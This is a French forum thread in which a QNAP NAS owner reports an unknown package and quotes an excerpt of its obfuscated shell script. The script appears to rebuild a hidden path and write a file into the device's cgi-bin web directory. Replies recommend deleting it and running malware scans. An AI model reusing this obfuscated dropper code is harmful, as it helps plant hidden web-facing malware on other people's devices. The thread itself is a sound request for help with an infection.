Qnap QPKG inconnu : iMgokjnqKq

Tryphon

Padawan
1 Mars 2015
108
3
18
Bonjour,

Un truc m'affole. Je remarque seulement aujourd'hui un QPKG actif dans le centre d'applications : iMgokjnqKq 1.0.2
Il n'y a aucune description.
Une recherche sur l'internet ne donne aucun résultat.

En console ssh, dans .qpkg, il y a un répertoire du même nom qui ne contient qu'un seul fichier : pIFywOdFfXv.sh
il est exécutable, est daté du 12 septembre et pèse 4667 octets.

L'édition du fichier donne ceci (extrait) :

Code:
vEPHaAcRtoPF=/$pUeIffRdzudgJq$''home/h${maSNWcWG}t${UBByMy}tpd/cgi-bin/Q${DKbCSMk}TSs${jpOwVHI}${GhhMLA}har${UvyPQgFLQ}e.c${KixiYicuFiWT}gi
${VmflNOsuXb}${bjeYCREPIi}t$YyxzkB$''r ''"'"'KYzpd+EG(`N]UmWbH*ZkSa\nFRtj)w| \-e%!<CQcn$B{ufl>O&MhgTxs}i"Dry=;PXIvJAL#qoV' 'Voq#LAJvIXP;=yrD"i}sxTghM&O>lfu{B$ncQC<!%e\- |w)jtRF\naSkZ*HbWmU]N`(GE+dpzYK'"'"'' << "PZGdyGqGoYaU" > $vEPHaAcRtoPF
zQ/"He/Z

Mais qu'est-ce que c'est que ce truc ???????

Urgent!

Merci

TS-653, QTS 4.3.3
 
Mouais bizarre supprime le et installe MalwareRemover, ensuite une analyse poussé avec l'antivirus. Vérifie tes logs aussi au niveau des ip etc ...
 
Ah part quelques bricoles trouvées dans des spams (non ouverts bien sûr), rien n'a été trouvé par l'antivirus ou Malware Remover. C'était long de tout ratisser sur les 4 To de données sur le serveur!

Merci pour le conseil.